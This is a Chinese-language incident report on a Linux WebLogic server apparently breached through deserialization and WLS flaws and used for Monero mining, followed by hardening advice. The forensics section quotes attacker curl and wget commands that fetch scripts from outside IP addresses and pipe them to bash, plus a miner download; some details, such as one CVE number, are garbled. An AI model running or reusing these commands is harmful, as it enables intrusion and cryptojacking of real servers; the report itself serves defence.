记录一次Linux系统Weblogic入侵到挖矿事件

背景

 某台运行有weblogic的服务器短时间内CPU使用率飙升到80%以上，严重影响正常业务程序使用。

初步结论

结合流量中的上百次的挖矿行为与主机端扫描出的恶意文件，初步判断是通过Weblogic服务进行挖矿的一次恶意事件。黑客可能通过利用 WebLogic 反序列化漏洞（CVE-2017-3248 ）和 WebLogic WLS 组件漏洞（CVE-2017-1027 1）对企业使用WebLogic WLS组件的业务进行入侵并植入

 

过程取证

通过查阅Linux的相关日志，发现有恶意用户通过执行curl命令与wget从远程服务器获取到脚本并使用bash命令成功执行。并且下载了名为xmrig-y的门罗币最块CPU挖矿软件

curl 45.123.190.178/lin.txt| bash
wget -q0 -http://45.123.190.178/lin |bash
curl 45.123.190.178/lin.txt| bash
downloader http://165.227.215.25/xmrig-y

详细的脚本内容参考如下

该脚本首先会杀掉本机上的python和java程序，然后下载运行比特币的挖矿程序xmrig-y（xmrig-y.exe，该程序被多款杀毒软件标示为挖矿或恶意木马程序），然后伪装成java文件运行

经过检查Weblogic的版本为 版本，且存在wls-wsat.war的war包

VT查杀进一步确认恶意文件样本

加固建议

1.删除wls-wsat应用包

WebLogic11g版本，wls-wsat应用包的位置：$WL_HOME/server/lib/wls-wsat.war

2.删除每个WebLogic Server目录下的tmp目录

有JSP网页木马已经潜伏在

$DOMAIN_HOME/servers/SERVER_NAME/tmp/_WL_internal/bea_wls_internal/目录下管理、被管Server均需执行。

位置：$DOMAIN_HOME/servers/SERVER_NAME/tmp

3.更新补丁和扫描:

更新Oracle官方发布相关补丁，下载链接：

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html